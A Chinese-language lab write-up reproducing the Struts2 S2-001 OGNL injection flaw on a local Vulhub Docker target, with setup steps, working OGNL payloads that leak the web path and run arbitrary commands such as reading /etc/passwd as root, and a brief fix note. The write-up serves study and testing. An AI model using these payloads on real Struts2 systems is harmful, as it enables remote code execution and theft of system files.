s2-001漏洞复现

struts2-001

该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行

搭建靶机环境：(前提 docker、vulhub 环境已搭建) 
1.进入vulhub目录下漏洞环境的目录 cd …/vulhub-master/structs/s2-001 
2.自动编译化环境 docker-compose build 
3.启动整个编译环境 docker-compose up -d 
4.查看是否启动成功 docker ps(正在运行的环境)

默认访问

http://192.168.80.130:8080/

因为已经知道了是什么漏洞；

而且后端是通过OGNL 表达式解析返回之前提交的数据；

既然已经知道这里有漏洞了 那我们现在就直接手动测试一下

(工具测试.........太......快.......了..就没意思了)

构造测试语句：

返回

接着测试

返回

返回 2 存在漏洞

发现password 括号里的值又返回来了

ok~ 确定漏洞

构造payload：

%{"tomcatBinDir{"@java.lang.System@getProperty("use.dir")+"}"}

其实漏洞的payload在 漏洞目录下的Readme.md里面有

语句执行，查看返回的语句是 /usr/local/tomcat 既是tomcat执行的语句

得到了 web路径 ，继续构造语句

构造payload 获取Web路径

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()} 

构造payload执行任意命令

(ps：修改pwd就可以)

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()} 

ok， 可以看见当前是 root用户权限

还可以修改成 "cat","/etc/passwd"

payload:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()} 

成功读取 /etc/passwd

ok，复现完成

此时记得

#关闭docker 环境

docker-compose down -v 

修复方式：

改变ognl表达式的解析方法从而不会产生递归解析，用户的输入也不会再解析执行。